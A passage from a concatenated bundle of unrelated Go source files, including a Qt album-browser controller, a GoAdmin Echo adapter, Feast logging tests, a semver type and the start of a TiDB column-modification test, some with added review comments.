			m.HandleSource(dacval, Advanced, &tStamp, &floatVal)
		}
	}
}
|
package controller
import (
"fmt"
"strconv"
"strings"
"time"
"github.com/therecipe/qt/core"
"github.com/therecipe/qt/widgets"
"github.com/therecipe/qt/xml"
"github.com/therecipe/qt/internal/examples/sql/masterdetail_qml/model"
)
var Instance *Controller
// Controller is the QObject bridging the QML views and the Go data models.
// The blank-identifier fields declare Qt properties and signals via struct
// tags; the therecipe/qt code generator wires them up at build time.
type Controller struct {
	core.QObject

	albumData *xml.QDomDocument       // XML archive of albums and their tracks
	qApp      *widgets.QApplication   // needed for the AboutQt dialog

	_ func() `constructor:"init"`

	_ *core.QAbstractItemModel `property:"artistModel"`
	_ *core.QAbstractItemModel `property:"albumModel"`

	//<-view
	_ func() `signal:"aboutQt"`
	//<-artist
	_ func(row int) `signal:"changeArtist"`
	//<-album
	_ func(index *core.QModelIndex) `signal:"deleteAlbum"`
	_ func(index *core.QModelIndex) `signal:"showAlbumDetails"`
	_ func(column int, order core.Qt__SortOrder) `signal:"sortTableView"`
	//->detail
	_ func() `signal:"showImageLabel"`
	_ func(profileLabelText string) `signal:"showArtistProfile"`
	_ func(title string, elements []string) `signal:"showTitleAndAlbumDetails"`
	//album<->dialog
	_ func() `signal:"deleteAlbumCommand"`
	_ func() `signal:"deleteAlbumRequest"`
	_ func(title, artist string) `signal:"deleteAlbumShowRequest"`
	//dialog<->view
	_ func() `signal:"addAlbumShowRequest"`
	_ func(artist string, title string, year int, tracks string) `signal:"addAlbum"`
}
// init wires up the data models and signal handlers; the Qt binding calls
// it via the `constructor:"init"` tag. It also starts a demo goroutine
// that inserts a generated album every five seconds.
func (c *Controller) init() {
	Instance = c
	c.albumData = xml.NewQDomDocument()
	c.SetArtistModel(model.NewListModel())
	c.SetAlbumModel(model.NewSortFilterModel())
	//<-view
	c.ConnectAboutQt(func() { c.qApp.AboutQt() })
	//<-artist
	c.ConnectChangeArtist(c.changeArtist)
	//<-album
	c.ConnectDeleteAlbum(c.deleteAlbum)
	c.ConnectShowAlbumDetails(c.showAlbumDetails)
	c.ConnectSortTableView(model.SortFilterModel.Sort)
	c.ConnectAddAlbum(c.addAlbum)
	// Demo feed: periodically add an album from a background goroutine.
	go func() {
		count := 0
		for range time.NewTicker(5 * time.Second).C {
			c.AddAlbum("goRoutineArtist", fmt.Sprint(count), 2017, "")
			count++
		}
	}()
}
// InitWith stores the application handle and loads the album XML archive
// from file.
func (c *Controller) InitWith(file *core.QFile, qApp *widgets.QApplication) {
	c.qApp = qApp
	c.readalbumData(file)
}
// changeArtist filters the album table to the artist selected at row and
// shows their profile. Row 0 clears the filter and shows the placeholder
// image instead.
func (c *Controller) changeArtist(row int) {
	artist := model.ListModel.Index(row, 0, core.NewQModelIndex()).Data(int(core.Qt__DisplayRole)).ToString()
	if row > 0 {
		model.SortFilterModel.SetFilterFixedString(artist)
		model.SortFilterModel.SetFilterKeyColumn(2)
		c.showArtistProfile(artist)
	} else if row == 0 {
		model.SortFilterModel.SetFilterFixedString("")
		c.ShowImageLabel()
	}
}
// showArtistProfile emits the ShowArtistProfile signal with the artist's
// name and album count.
func (c *Controller) showArtistProfile(artist string) {
	count := model.GetAlbumCountForArtist(artist)
	c.ShowArtistProfile(fmt.Sprintf("Artist : %v \nNumber of Albums: %v", artist, count))
}
// showAlbumDetails shows the artist profile and the track list for the
// album selected at index. The Qt__UserRole offsets read below are: +1 id,
// +2 title, +3 artist, +4 year.
func (c *Controller) showAlbumDetails(index *core.QModelIndex) {
	artist := index.Data(int(core.Qt__UserRole) + 3).ToString()
	title := index.Data(int(core.Qt__UserRole) + 2).ToString()
	year := index.Data(int(core.Qt__UserRole) + 4).ToString()
	albumId := index.Data(int(core.Qt__UserRole) + 1).ToString()
	c.showArtistProfile(artist)
	// Locate the matching <album> element in the XML archive to collect
	// its tracks.
	var trackList []string
	albums := c.albumData.ElementsByTagName("album")
	for i := 0; i < albums.Count(); i++ {
		album := albums.Item(i)
		if album.ToElement().Attribute("id", "") == albumId {
			trackList = c.getTrackList(album.ToElement())
			break
		}
	}
	c.ShowTitleAndAlbumDetails(fmt.Sprintf("Title: %v (%v)", title, year), trackList)
}
// readalbumData loads the album XML archive from file into c.albumData.
// The file is closed on both the parse-failure and success paths; a failed
// Open leaves albumData untouched.
func (c *Controller) readalbumData(file *core.QFile) {
	if !file.Open(core.QIODevice__ReadOnly) {
		return
	}
	if !c.albumData.SetContent3(file, false, "", 0, 0) {
		file.Close()
		return
	}
	file.Close()
}
// getTrackList returns one "<number>: <title>" string per <track> child of
// the given <album> element.
func (c *Controller) getTrackList(album *xml.QDomElement) []string {
	var out []string
	children := album.ChildNodes()
	for j := 0; j < children.Count(); j++ {
		el := children.Item(j).ToElement()
		out = append(out, el.Attribute("number", "")+": "+el.Text())
	}
	return out
}
// deleteAlbum removes the album selected at index from both the XML
// archive (role +1 holds the id) and the database model.
func (c *Controller) deleteAlbum(index *core.QModelIndex) {
	albumId := index.Data(int(core.Qt__UserRole) + 1).ToInt(nil)
	c.removeAlbumFromFile(albumId)
	c.removeAlbumFromDatabase(index)
}
// removeAlbumFromFile deletes the <album> element with the given id from
// the in-memory XML archive. The on-disk file is deliberately not updated
// (see the comment below).
func (c *Controller) removeAlbumFromFile(id int) {
	albums := c.albumData.ElementsByTagName("album")
	for i := 0; i < albums.Count(); i++ {
		node := albums.Item(i)
		if node.ToElement().Attribute("id", "") == strconv.Itoa(id) {
			c.albumData.ElementsByTagName("archive").Item(0).RemoveChild(node)
			break
		}
	}
	/*
		The following code is commented out since the example uses an in
		memory database, i.e., altering the XML file will bring the data
		out of sync.

		if !c.file.Open(core.QIODevice__WriteOnly) {
			return
		} else {
			stream := core.NewQTextStream2(w.file)
			c.albumData.ElementsByTagName("archive").Item(0).Save(stream, 4, 0)
			c.file.Close()
		}
	*/
}
// removeAlbumFromDatabase deletes the album selected at index from the
// backing store, using a full model reset (see TODO below for why row
// removal is not used), then restores the placeholder image.
func (c *Controller) removeAlbumFromDatabase(index *core.QModelIndex) {
	//TODO
	//inserting or removing from this model (SortFilterModel) will NOT affect the sourceModel
	//(because calls are not going through?) and it will therefore lead to glitches
	//resetModel however affectes both models and works ... but it can be slow
	//model.SortFilterModel.BeginRemoveRows(core.NewQModelIndex(), index.Row(), index.Row())
	model.SortFilterModel.BeginResetModel()
	model.DeleteAlbum(index.Data(int(core.Qt__UserRole) + 1).ToInt(nil))
	model.SortFilterModel.EndResetModel()
	//model.SortFilterModel.EndRemoveRows()
	c.ShowImageLabel()
}
// addAlbum creates an album (and, if needed, its artist) and records the
// comma-separated track titles.
func (c *Controller) addAlbum(artist string, title string, year int, tracks string) {
	existing := model.GetArtistForName(artist)
	var artistId int
	if existing == nil {
		artistId = c.addNewArtist(artist)
	} else {
		artistId = existing.ID
	}
	albumId := c.addNewAlbum(title, artistId, year)
	c.addTracks(albumId, strings.Split(tracks, ","))
}
// addNewArtist inserts a new artist row into the list model and returns
// the freshly allocated artist id.
func (c *Controller) addNewArtist(name string) int {
	artistId := model.GetNextArtistID()
	row := model.ListModel.RowCount(core.NewQModelIndex()) + 1
	model.ListModel.BeginInsertRows(core.NewQModelIndex(), row, row)
	model.CreateNewArtist(artistId, name)
	model.ListModel.EndInsertRows()
	return artistId
}
// addNewAlbum creates an album row for artistId via a full model reset
// (see TODO below for why row insertion is not used) and returns the new
// album id.
func (c *Controller) addNewAlbum(title string, artistId int, year int) int {
	albumId := model.GetNextAlbumID()
	//TODO
	//inserting or removing from this model (SortFilterModel) will NOT affect the sourceModel
	//(because calls are not going through?) and it will therefore lead to glitches
	//resetModel however affectes both models and works ... but it can be slow
	//model.SortFilterModel.BeginInsertRows(core.NewQModelIndex(), d.model.RowCount(core.NewQModelIndex())+1, d.model.RowCount(core.NewQModelIndex())+1)
	model.SortFilterModel.BeginResetModel()
	model.CreateNewAlbum(artistId, albumId, title, year)
	model.SortFilterModel.EndResetModel()
	//model.SortFilterModel.EndInsertRows()
	return albumId
}
// addTracks appends a new <album> element (with one <track> child per
// entry in tracks) to the in-memory XML archive. Track numbers are
// zero-based and zero-padded to two digits ("00", "01", ...). The on-disk
// file is deliberately not updated (see the comment below).
func (c *Controller) addTracks(albumId int, tracks []string) {
	albumNode := c.albumData.CreateElement("album")
	albumNode.SetAttribute4("id", albumId)
	for i := 0; i < len(tracks); i++ {
		trackNumber := strconv.Itoa(i)
		if i < 10 {
			trackNumber = "0" + trackNumber
		}
		textNode := c.albumData.CreateTextNode(tracks[i])
		trackNode := c.albumData.CreateElement("track")
		trackNode.SetAttribute("number", trackNumber)
		trackNode.AppendChild(textNode)
		albumNode.AppendChild(trackNode)
	}
	archive := c.albumData.ElementsByTagName("archive")
	archive.Item(0).AppendChild(albumNode)
	/*
		The following code is commented out since the example uses an in
		memory database, i.e., altering the XML file will bring the data
		out of sync.

		if !d.outputFile.Open(core.QIODevice__WriteOnly) {
			return
		} else {
			stream := core.NewQTextStream2(d.outputFile)
			archive.Item(0).Save(stream, 4, 0)
			d.outputFile.Close()
		}
	*/
}
|
package main
import (
"flag"
"fmt"
"github.com/misalcedo/jukebox/files"
"github.com/misalcedo/jukebox/workers"
)
// command is the index of the positional argument holding the subcommand.
const command int = 0

// Parameters bundles the filesystem locations the tool operates on.
type Parameters struct {
	SourcePath      string // root of the existing music collection
	DestinationPath string // where library changes are written
}
// main parses the source/destination flags and walks the music collection.
func main() {
	fmt.Println("Welcome to JukeBox a handy command-line tool to manage your music collection.")
	// FIX: the flag pointers were previously dereferenced BEFORE
	// flag.Parse(), so user-supplied -source/-destination values were
	// always ignored in favor of the defaults. Dereference after parsing.
	sourcePath := flag.String("source", "/home/miguel/Music", "The filesystem path to use as the source of the music collection.")
	destinationPath := flag.String("destination", "/tmp", "The filesystem path to use as the destination for changes to the music library.")
	flag.Parse()
	fmt.Println(*sourcePath)
	fmt.Println(*destinationPath)
	fmt.Println(flag.Arg(command))
	execute(Parameters{SourcePath: *sourcePath, DestinationPath: *destinationPath})
}
// execute walks the source directory tree using a 512-worker pool.
func execute(parameters Parameters) {
	pool := workers.New(512)
	files.New(parameters.SourcePath).Walk(pool)
}
|
package remento
import (
"github.com/fncodr/godbase"
)
// Prod is a product record; it embeds BasicRec for common record behavior.
type Prod struct {
	BasicRec
}
// NewProd allocates and initializes a product record for the given context.
func NewProd(cx *Cx) *Prod {
	p := new(Prod)
	return p.Init(cx)
}
// OnUpsert refreshes the product's text index when any of the text-bearing
// columns (Details, Name, Summary) is dirty in the current context.
func (self *Prod) OnUpsert(cx *Cx) error {
	db := cx.Db().(*Db)
	if db.ProdTbl.Dirty(cx, self, &db.Details, &db.Name, &db.Summary) {
		if err := UpdateText(cx, self); err != nil {
			return err
		}
	}
	return nil
}
// Init assigns a fresh unique id to the record and returns the receiver.
// The cx parameter is currently unused — presumably kept for signature
// symmetry with other record types; TODO confirm.
func (self *Prod) Init(cx *Cx) *Prod {
	self.BasicRec.Init(godbase.NewUId())
	return self
}
|
package main
import (
"html/template"
"log"
"os"
)
// course describes a single course offering.
type course struct {
	Number string
	Name   string
	Units  string
}

// semester is one term's worth of course offerings.
type semester struct {
	Term string
	// FIX: Courses was missing from the declaration even though main
	// populates it in every semester literal, so the file did not compile.
	Courses []course
}

// year groups the three semesters of one academic year.
type year struct {
	AcaYear string
	Fall    semester
	Spring  semester
	Summer  semester
}
// tpl holds every template parsed from src/*.gohtml.
var tpl *template.Template

// init parses the templates at startup; template.Must panics if any file
// fails to parse or the glob matches nothing.
func init() {
	tpl = template.Must(template.ParseGlob("src/*.gohtml"))
}
// main builds a two-year course catalog and renders it to stdout with the
// tpl.gohtml template.
// NOTE(review): these literals populate a Courses field on semester; the
// semester type declaration must include `Courses []course` for this file
// to compile.
func main() {
	years := []year{
		year{
			AcaYear: "2020-2021",
			Fall: semester{
				Term: "Fall",
				Courses: []course{
					course{"CSCI-40", "Introduction to Programming in Go", "4"},
					course{"CSCI-130", "Introduction to Web Programming with Go", "4"},
					course{"CSCI-140", "Mobile Apps Using Go", "4"},
				},
			},
			Spring: semester{
				Term: "Spring",
				Courses: []course{
					course{"CSCI-50", "Advanced Go", "5"},
					course{"CSCI-190", "Advanced Web Programming with Go", "5"},
					course{"CSCI-191", "Advanced Mobile Apps With Go", "5"},
				},
			},
		},
		year{
			AcaYear: "2021-2022",
			Fall: semester{
				Term: "Fall",
				Courses: []course{
					course{"CSCI-40", "Introduction to Programming in Go", "4"},
					course{"CSCI-130", "Introduction to Web Programming with Go", "4"},
					course{"CSCI-140", "Mobile Apps Using Go", "4"},
				},
			},
			Spring: semester{
				Term: "Spring",
				Courses: []course{
					course{"CSCI-50", "Advanced Go", "5"},
					course{"CSCI-190", "Advanced Web Programming with Go", "5"},
					course{"CSCI-191", "Advanced Mobile Apps With Go", "5"},
				},
			},
		},
	}
	err := tpl.ExecuteTemplate(os.Stdout, "tpl.gohtml", years)
	if err != nil {
		log.Fatalln(err)
	}
}
|
package main //嵌入的反射
import (
"fmt"
"reflect"
)
// User is the embedded base record for the reflection demo.
type User struct {
	Id   int
	Name string
	Age  int
}

// Manager embeds User and adds an unexported title.
type Manager struct {
	User
	title string
}

func main() {
	mgr := Manager{User: User{1, "sh", 34}, title: "title"}
	mgrType := reflect.TypeOf(mgr)
	// Pass an index slice to reach a field of the embedded struct:
	// {0, 1} selects Manager.User (index 0), then User.Name (index 1).
	fmt.Printf("%#v \n ", mgrType.FieldByIndex([]int{0, 1}))
}
|
package main
import "fmt"
// user is a small demo record used by the grouping examples below.
type user struct {
	id        int
	username  string
	firstname string
}
// main builds a small fixture of users and prints two groupings of it.
func main() {
	users := []user{
		{id: 1, username: "a", firstname: "aa"},
		{id: 2, username: "b", firstname: "aa"},
		{id: 3, username: "c", firstname: "cc"},
		{id: 4, username: "d", firstname: "dd"},
	}
	groupbyUsername(users)
	groupByCount(users)
}
// groupbyUsername prints the users bucketed into a map keyed by firstname.
// NOTE(review): despite the name, this groups by firstname, not username —
// confirm which key was intended.
func groupbyUsername(users []user) {
	group := make(map[string][]user)
	for _, u := range users {
		// The original also had `if v, exists := group[...]; exists { v = append(v, user) }`,
		// which appended to a discarded copy of the slice header — dead code
		// with no effect on the map. Removed; output is unchanged.
		group[u.firstname] = append(group[u.firstname], u)
	}
	fmt.Println(group)
}
// groupByCount prints how many users share each firstname.
func groupByCount(users []user) {
	counts := map[string]int{}
	for _, u := range users {
		counts[u.firstname]++
	}
	fmt.Println(counts)
}
|
package game
// Color is an RGB pixel color.
type Color struct {
	R byte
	G byte
	B byte
}

// Pos describes the position as 2D screen coordinates.
type Pos struct {
	X float32
	Y float32
}

// Ball represents the pong ball.
type Ball struct {
	Pos            // position — center vs corner can't be told from here; confirm against the renderer
	Radius float32 // radius of the ball
	XV     float32 // X velocity
	YV     float32 // Y velocity
	Color  Color
}

// Paddle represents the pong paddle.
type Paddle struct {
	Pos           // position — center vs corner can't be told from here; confirm against the renderer
	W     float32 // Width
	H     float32 // Height
	Color Color
	Score int
}
|
// Copyright 2019 GoAdmin Core Team. All rights reserved.
// Use of this source code is governed by a Apache-2.0 style
// license that can be found in the LICENSE file.
package echo
import (
"bytes"
"errors"
"net/http"
"net/url"
"strings"
"github.com/GoAdminGroup/go-admin/adapter"
"github.com/GoAdminGroup/go-admin/context"
"github.com/GoAdminGroup/go-admin/engine"
"github.com/GoAdminGroup/go-admin/modules/config"
"github.com/GoAdminGroup/go-admin/plugins"
"github.com/GoAdminGroup/go-admin/plugins/admin/models"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/constant"
"github.com/GoAdminGroup/go-admin/template/types"
"github.com/labstack/echo/v4"
)
// Echo structure value is an Echo GoAdmin adapter.
// It carries the per-request echo.Context and the application *echo.Echo.
type Echo struct {
	adapter.BaseAdapter
	ctx echo.Context
	app *echo.Echo
}

// init registers this adapter with the GoAdmin engine at import time.
func init() {
	engine.Register(new(Echo))
}

// User implements the method Adapter.User.
func (e *Echo) User(ctx interface{}) (models.UserModel, bool) {
	return e.GetUser(ctx, e)
}

// Use implements the method Adapter.Use.
func (e *Echo) Use(app interface{}, plugs []plugins.Plugin) error {
	return e.GetUse(app, plugs, e)
}

// Content implements the method Adapter.Content.
func (e *Echo) Content(ctx interface{}, getPanelFn types.GetPanelFn, fn context.NodeProcessor, btns ...types.Button) {
	e.GetContent(ctx, getPanelFn, e, btns, fn)
}
// HandlerFunc is a GoAdmin content handler operating on an echo.Context.
type HandlerFunc func(ctx echo.Context) (types.Panel, error)

// Content wraps a HandlerFunc into an echo.HandlerFunc that renders the
// returned panel through the GoAdmin engine. It always returns nil to echo.
func Content(handler HandlerFunc) echo.HandlerFunc {
	return func(ctx echo.Context) error {
		engine.Content(ctx, func(ctx interface{}) (types.Panel, error) {
			return handler(ctx.(echo.Context))
		})
		return nil
	}
}
// SetApp implements the method Adapter.SetApp.
// It accepts only a *echo.Echo and stores it for route registration.
func (e *Echo) SetApp(app interface{}) error {
	eng, ok := app.(*echo.Echo)
	if !ok {
		return errors.New("echo adapter SetApp: wrong parameter")
	}
	e.app = eng
	return nil
}
// AddHandler implements the method Adapter.AddHandler.
// It registers a GoAdmin handler chain on the echo router. Echo path
// parameters are appended to the request's raw query string (with any ":"
// stripped from the name) so GoAdmin's context, which only sees
// *http.Request, can read them as query values.
func (e *Echo) AddHandler(method, path string, handlers context.Handlers) {
	e.app.Add(strings.ToUpper(method), path, func(c echo.Context) error {
		ctx := context.NewContext(c.Request())
		for _, key := range c.ParamNames() {
			if c.Request().URL.RawQuery == "" {
				c.Request().URL.RawQuery += strings.ReplaceAll(key, ":", "") + "=" + c.Param(key)
			} else {
				c.Request().URL.RawQuery += "&" + strings.ReplaceAll(key, ":", "") + "=" + c.Param(key)
			}
		}
		ctx.SetHandlers(handlers).Next()
		// Mirror headers produced by the GoAdmin handlers onto the echo
		// response; only the first value of each header is forwarded.
		for key, head := range ctx.Response.Header {
			c.Response().Header().Set(key, head[0])
		}
		if ctx.Response.Body != nil {
			buf := new(bytes.Buffer)
			_, _ = buf.ReadFrom(ctx.Response.Body)
			_ = c.String(ctx.Response.StatusCode, buf.String())
		} else {
			c.Response().WriteHeader(ctx.Response.StatusCode)
		}
		return nil
	})
}
// Name implements the method Adapter.Name.
// It identifies this adapter as "echo" to the GoAdmin engine.
func (*Echo) Name() string {
	return "echo"
}
// SetContext implements the method Adapter.SetContext.
// It returns a fresh adapter bound to the given echo.Context and panics
// when handed anything else.
func (*Echo) SetContext(contextInterface interface{}) adapter.WebFrameWork {
	ctx, ok := contextInterface.(echo.Context)
	if !ok {
		panic("echo adapter SetContext: wrong parameter")
	}
	return &Echo{ctx: ctx}
}
// Redirect implements the method Adapter.Redirect.
// It sends the client to the configured login URL with a 302 Found;
// the redirect error is deliberately ignored.
func (e *Echo) Redirect() {
	_ = e.ctx.Redirect(http.StatusFound, config.Url(config.GetLoginUrl()))
}

// SetContentType implements the method Adapter.SetContentType.
func (e *Echo) SetContentType() {
	e.ctx.Response().Header().Set("Content-Type", e.HTMLContentType())
}

// Write implements the method Adapter.Write.
// It writes body with status 200 OK; the write error is deliberately ignored.
func (e *Echo) Write(body []byte) {
	e.ctx.Response().WriteHeader(http.StatusOK)
	_, _ = e.ctx.Response().Write(body)
}

// GetCookie implements the method Adapter.GetCookie.
// It returns the value of the adapter's session cookie.
func (e *Echo) GetCookie() (string, error) {
	cookie, err := e.ctx.Cookie(e.CookieKey())
	if err != nil {
		return "", err
	}
	return cookie.Value, err
}
// Lang implements the method Adapter.Lang.
// It reads the UI language from the "__ga_lang" query parameter.
func (e *Echo) Lang() string {
	return e.ctx.Request().URL.Query().Get("__ga_lang")
}

// Path implements the method Adapter.Path.
func (e *Echo) Path() string {
	return e.ctx.Request().URL.Path
}

// Method implements the method Adapter.Method.
func (e *Echo) Method() string {
	return e.ctx.Request().Method
}

// FormParam implements the method Adapter.FormParam.
// It parses up to 32 MiB of multipart form data (the parse error is
// deliberately ignored) and returns the request's PostForm.
func (e *Echo) FormParam() url.Values {
	_ = e.ctx.Request().ParseMultipartForm(32 << 20)
	return e.ctx.Request().PostForm
}

// IsPjax implements the method Adapter.IsPjax.
// A request counts as PJAX when the PJAX header is literally "true".
func (e *Echo) IsPjax() bool {
	return e.ctx.Request().Header.Get(constant.PjaxHeader) == "true"
}

// Query implements the method Adapter.Query.
func (e *Echo) Query() url.Values {
	return e.ctx.Request().URL.Query()
}
|
package types
// Type is a placeholder for a pointer to any other type in this package.
type Type interface{}

// Docs represents documentation text attached to other types.
type Docs struct {
	Text string
}

// Field represents a function argument or return value.
// Docs and name are optional.
type Field struct {
	Name string
	Docs Docs
	Type string
}

// Function represents a function type.
// Docs, arguments and return values are optional.
type Function struct {
	Name         string
	Docs         Docs
	Arguments    []Field
	ReturnValues []Field
}

// Reference represents a reference to another value.
// Docs and package are optional.
type Reference struct {
	Package string
	Name    string
	Docs    Docs
}

// Interface represents an interface type.
// Docs, embedded and methods are optional.
type Interface struct {
	Name     string
	Docs     Docs
	Embedded []Reference
	Methods  []Function
}

// Value represents a const or var declaration.
// Docs and const are optional. Exactly one of type or value should be specified.
type Value struct {
	Name  string
	Docs  Docs
	Const bool // true for const declarations, false for var
	Type  string
	Value string
}
|
package logging
import (
"context"
"io/ioutil"
"path/filepath"
"testing"
"time"
"github.com/apache/arrow/go/v8/arrow"
"github.com/apache/arrow/go/v8/arrow/array"
"github.com/apache/arrow/go/v8/arrow/memory"
"github.com/apache/arrow/go/v8/parquet/file"
"github.com/apache/arrow/go/v8/parquet/pqarrow"
"github.com/stretchr/testify/require"
"github.com/feast-dev/feast/go/protos/feast/types"
"github.com/stretchr/testify/assert"
"google.golang.org/protobuf/types/known/timestamppb"
"github.com/feast-dev/feast/go/protos/feast/serving"
)
// DummySink is a no-op sink used by tests that do not care about output.
type DummySink struct{}

// Write discards the records and reports success.
func (s *DummySink) Write(recs []arrow.Record) error {
	return nil
}

// Flush is a no-op and reports success.
func (s *DummySink) Flush(featureServiceName string) error {
	return nil
}
// TestLoggingChannelTimeout verifies that EmitLog fails (instead of
// blocking) once the capacity-1 buffering channel is full and the log
// processor has been stopped.
func TestLoggingChannelTimeout(t *testing.T) {
	config := LoggerConfig{
		SampleRate: 1.0,
		LoggingOptions: LoggingOptions{
			ChannelCapacity: 1,
			EmitTimeout:     DefaultOptions.EmitTimeout,
			FlushInterval:   DefaultOptions.FlushInterval,
			WriteInterval:   DefaultOptions.WriteInterval,
		},
	}
	logger, err := NewLogger(&FeatureServiceSchema{}, "testFS", &DummySink{}, config)
	// Check the constructor error before touching logger: previously it was
	// asserted only after Stop()/WaitUntilStopped(), so a constructor failure
	// would nil-panic instead of failing the test cleanly.
	require.NoError(t, err)
	// stop log processing to check buffering channel
	logger.Stop()
	logger.WaitUntilStopped()
	assert.Empty(t, logger.buffer.logs)
	ts := timestamppb.New(time.Now())
	newLog := Log{
		FeatureStatuses: []serving.FieldStatus{serving.FieldStatus_PRESENT},
		EventTimestamps: []*timestamppb.Timestamp{ts, ts},
	}
	err = logger.EmitLog(&newLog)
	assert.Nil(t, err)
	newLog2 := Log{
		FeatureStatuses: []serving.FieldStatus{serving.FieldStatus_PRESENT},
		EventTimestamps: []*timestamppb.Timestamp{ts, ts},
	}
	err = logger.EmitLog(&newLog2)
	// The channel times out and doesn't hang.
	assert.NotNil(t, err)
}
// TestLogAndFlushToFile logs one row, waits for the file sink to flush a
// parquet file to disk, then reads the file back and checks every column.
func TestLogAndFlushToFile(t *testing.T) {
	sink, err := NewFileLogSink(t.TempDir())
	// Preconditions use require: the values are dereferenced below, so
	// continuing after a failed assert would nil-panic.
	require.NoError(t, err)
	schema := &FeatureServiceSchema{
		JoinKeys:      []string{"driver_id"},
		Features:      []string{"view__feature"},
		JoinKeysTypes: map[string]types.ValueType_Enum{"driver_id": types.ValueType_INT32},
		FeaturesTypes: map[string]types.ValueType_Enum{"view__feature": types.ValueType_DOUBLE},
	}
	config := LoggerConfig{
		SampleRate: 1.0,
		LoggingOptions: LoggingOptions{
			ChannelCapacity: DefaultOptions.ChannelCapacity,
			EmitTimeout:     DefaultOptions.EmitTimeout,
			FlushInterval:   DefaultOptions.FlushInterval,
			WriteInterval:   10 * time.Millisecond,
		},
	}
	logger, err := NewLogger(schema, "testFS", sink, config)
	require.NoError(t, err)
	assert.Nil(t, logger.Log(
		map[string]*types.RepeatedValue{
			"driver_id": {
				Val: []*types.Value{
					{
						Val: &types.Value_Int32Val{
							Int32Val: 111,
						},
					},
				},
			},
		},
		[]*serving.GetOnlineFeaturesResponse_FeatureVector{
			{
				Values:          []*types.Value{{Val: &types.Value_DoubleVal{DoubleVal: 2.0}}},
				Statuses:        []serving.FieldStatus{serving.FieldStatus_PRESENT},
				EventTimestamps: []*timestamppb.Timestamp{timestamppb.Now()},
			},
		},
		[]string{"view__feature"},
		map[string]*types.RepeatedValue{},
		"req-id",
	))
	// Wait until the sink has written at least one file.
	// NOTE(review): ioutil.ReadDir is deprecated; os.ReadDir is the modern
	// replacement (left as-is to avoid an import change here).
	require.Eventually(t, func() bool {
		files, _ := ioutil.ReadDir(sink.path)
		return len(files) > 0
	}, 60*time.Second, 100*time.Millisecond)
	files, _ := ioutil.ReadDir(sink.path)
	pf, err := file.OpenParquetFile(filepath.Join(sink.path, files[0].Name()), false)
	require.NoError(t, err)
	reader, err := pqarrow.NewFileReader(pf, pqarrow.ArrowReadProperties{}, memory.DefaultAllocator)
	require.NoError(t, err)
	tbl, err := reader.ReadTable(context.Background())
	require.NoError(t, err)
	tr := array.NewTableReader(tbl, -1)
	defer tbl.Release()
	defer tr.Release() // was leaked: the reader holds references until released
	fieldNameToIdx := make(map[string]int)
	for idx, field := range tbl.Schema().Fields() {
		fieldNameToIdx[field.Name] = idx
	}
	tr.Next()
	rec := tr.Record()
	assert.Equal(t, "req-id", rec.Column(fieldNameToIdx[LOG_REQUEST_ID_FIELD]).(*array.String).Value(0))
	assert.EqualValues(t, 111, rec.Column(fieldNameToIdx["driver_id"]).(*array.Int32).Value(0))
	assert.EqualValues(t, 2.0, rec.Column(fieldNameToIdx["view__feature"]).(*array.Float64).Value(0))
	assert.EqualValues(t, serving.FieldStatus_PRESENT, rec.Column(fieldNameToIdx["view__feature__status"]).(*array.Int32).Value(0))
}
|
package semver
import "fmt"
// Version holds the components of a semantic version:
// MAJOR.MINOR.PATCH[-PRERELEASE][+BUILDMETA].
type Version struct {
	Major      int
	Minor      int
	Patch      int
	PreRelease string
	BuildMeta  string
}

// NewSemVer builds a *Version from its individual components.
func NewSemVer(major, minor, patch int, pre, build string) *Version {
	v := Version{
		Major:      major,
		Minor:      minor,
		Patch:      patch,
		PreRelease: pre,
		BuildMeta:  build,
	}
	return &v
}

// String renders the version in SemVer form, prefixing the pre-release
// part with "-" and the build metadata with "+" unless those prefixes
// are already present.
func (v Version) String() string {
	pre, build := v.PreRelease, v.BuildMeta
	if pre != "" && pre[0] != '-' {
		pre = "-" + pre
	}
	if build != "" && build[0] != '+' {
		build = "+" + build
	}
	return fmt.Sprintf("%d.%d.%d%s%s", v.Major, v.Minor, v.Patch, pre, build)
}
|
// Copyright 2022 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package ddl_test
import (
"context"
"fmt"
"math/rand"
"strconv"
"strings"
"testing"
"time"
"github.com/pingcap/errors"
testddlutil "github.com/pingcap/tidb/ddl/testutil"
"github.com/pingcap/tidb/ddl/util/callback"
"github.com/pingcap/tidb/domain"
"github.com/pingcap/tidb/errno"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/parser/ast"
"github.com/pingcap/tidb/parser/model"
"github.com/pingcap/tidb/parser/mysql"
"github.com/pingcap/tidb/sessiontxn"
"github.com/pingcap/tidb/store/mockstore"
"github.com/pingcap/tidb/table"
"github.com/pingcap/tidb/table/tables"
"github.com/pingcap/tidb/testkit"
"github.com/pingcap/tidb/testkit/external"
"github.com/pingcap/tidb/types"
"github.com/pingcap/tidb/util/mock"
"github.com/stretchr/testify/require"
)
// columnModifyLease is the schema lease used for the mock stores in the
// column-modification tests below.
const columnModifyLease = 600 * time.Millisecond
// TestAddAndDropColumn exercises online ADD COLUMN and DROP COLUMN while
// concurrent DML runs against the same table, then checks column metadata
// for timestamp/datetime/year additions and the unsupported-constraint errors.
func TestAddAndDropColumn(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	tk.MustExec("create table t2 (c1 int, c2 int, c3 int)")
	tk.MustExec("set @@tidb_disable_txn_auto_retry = 0")
	// ==========
	// ADD COLUMN
	// ==========
	done := make(chan error, 1)
	num := defaultBatchSize + 10
	// add some rows
	batchInsert(tk, "t2", 0, num)
	testddlutil.SessionExecInGoroutine(store, "test", "alter table t2 add column c4 int default -1", done)
	ticker := time.NewTicker(columnModifyLease / 2)
	defer ticker.Stop()
	step := 10
AddLoop:
	for {
		select {
		case err := <-done:
			if err == nil {
				break AddLoop
			}
			require.NoError(t, err)
		case <-ticker.C:
			// delete some rows, and add some data
			for i := num; i < num+step; i++ {
				n := rand.Intn(num)
				tk.MustExec("begin")
				tk.MustExec("delete from t2 where c1 = ?", n)
				tk.MustExec("commit")
				// Make sure that statement of insert and show use the same infoSchema.
				tk.MustExec("begin")
